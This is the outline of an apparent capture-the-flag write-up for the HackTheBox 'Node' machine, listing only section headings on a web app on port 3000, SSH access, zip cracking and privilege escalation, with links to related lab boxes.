TCP/3000 (HTTP) - Insecure Web Application

TCP/22 (SSH) - Bruteforce

TCP/3000 (HTTP)

Crack zip file

TCP/22 (SSH)

Privilege Escalation

Tom - Via Insecure Application

Root - Via SUID Binary + Insecure Application

Further Reading

Vulnhub - Bob 1.0.1

HackTheBox - Node

Vulnhub - Tommy Boy 1